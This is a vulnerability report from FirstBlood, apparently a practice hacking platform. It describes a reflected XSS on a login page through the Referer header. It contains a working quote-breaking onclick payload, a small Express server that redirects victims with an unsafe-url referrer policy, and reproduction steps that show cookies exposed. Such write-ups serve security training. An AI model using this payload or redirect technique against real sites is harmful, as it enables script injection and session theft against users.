FirstBlood-#583 — Reflective XSS via Referer on login.php endpoint
This issue was discovered on FirstBlood v2
On 2021-10-26, panya Level 7 reported:
The site is vulnerable to Reflective XSS on the /login.php endpoint. It reflects the Referer header value inside the "Return to previous page" link's href (in single quotes).
Steps to reproduce:
- Open this url: http://ztn.me/test'onclick=alert(document.cookie);return(false)//
  It is hosted on my server:
    // Minimal Express server: answers every path with a page that sends
    // the browser on to the target's login.php.
    const express = require('express');
    const app = express();
    app.get('*', (req, res) => {
      // unsafe-url makes the browser include the full URL of this page
      // (path and all) in the Referer header of the cross-origin navigation.
      res.set('Referrer-Policy', 'unsafe-url');
      res.set('Content-Type', 'text/html');
      res.end('<script>location.replace("https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php");</script>');
    });
    app.listen(80);
- The browser will redirect you to https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php
- Click on the "Return to previous page" link.
Actual result:
There will be an alert with the user's document.cookie value (doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 in our case).
Expected result:
The Referer header's value should be properly escaped or sanitized. The alert should not be shown.
Impact:
An attacker could execute JS code on behalf of a user of this site.
P3 Medium
Endpoint: /login.php
Parameter: Referer:
Payload: http://ztn.me/test'onclick=alert(document.cookie);return(false)//
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The ?ref= parameter on login.php was fixed and $_SERVER['HTTP_REFERER'] was used instead. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments, for example!) and the Referer header is vulnerable to reflective XSS.
Creator & Administrator
Nice panya! Fun fact: even though the referrer is vulnerable, on a lot of the reports for this the payload provided simply wouldn't work (use of < > etc). So kudos for providing a working PoC. Actually for me when testing it would only work on IE, as it seems for me on the latest version of Chrome/FF the ' character is now filtered. I'll play some more though and may update this bug description.